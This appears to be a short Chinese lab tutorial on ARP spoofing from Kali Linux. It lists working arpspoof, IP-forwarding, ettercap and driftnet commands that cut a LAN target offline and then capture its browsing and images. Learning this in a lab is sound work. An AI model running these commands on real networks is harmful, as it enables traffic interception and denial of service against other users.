ARP欺骗Kali

实验环境:处于同一局域网下的Kali攻击机和靶机

实验步骤:

arp攻击:

1.查看Kali自身所处的网络

ifconfig

ARP欺骗Kali_第1张图片

2.用nmap扫描该局域网下的其他用户

namp -sP 172.20.10.7/24

ARP欺骗Kali_第2张图片

发现有三台设备正处于这一网络下,其中1为所开热点的手机(路由器)、2为靶机、3为kali IP

3.在Kali中使用arpspoof工具实现ARP攻击第一个路由器IP,后一个靶机ip

arpspoof -i eth0 -t 172.20.10.1 172.20.10.2

此时靶机已经断网

arp欺骗:

1.若想实现arp欺骗则需要在实施arp攻击命令之前把/proc/sys/net/ipv4/ip_forward这一路径文件默认内容0改为1

cat /proc/sys/net/ipv4/ip_forward
echo 1 >> /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
ARP欺骗Kali_第3张图片
2.实施arp攻击:第一个路由器IP,后一个靶机ip

arpspoof -i eth0 -t 172.20.10.1 172.20.10.2

3.此时另建新的终端

ettercap -Tq -i eth0
ARP欺骗Kali_第4张图片
4.此时可以接收靶机浏览信息、一下空格开始接受、再按一下停止

ARP欺骗Kali_第5张图片

5.进行图片监控

driftnet -i eth0
ARP欺骗Kali_第6张图片

你可能感兴趣的:(安全)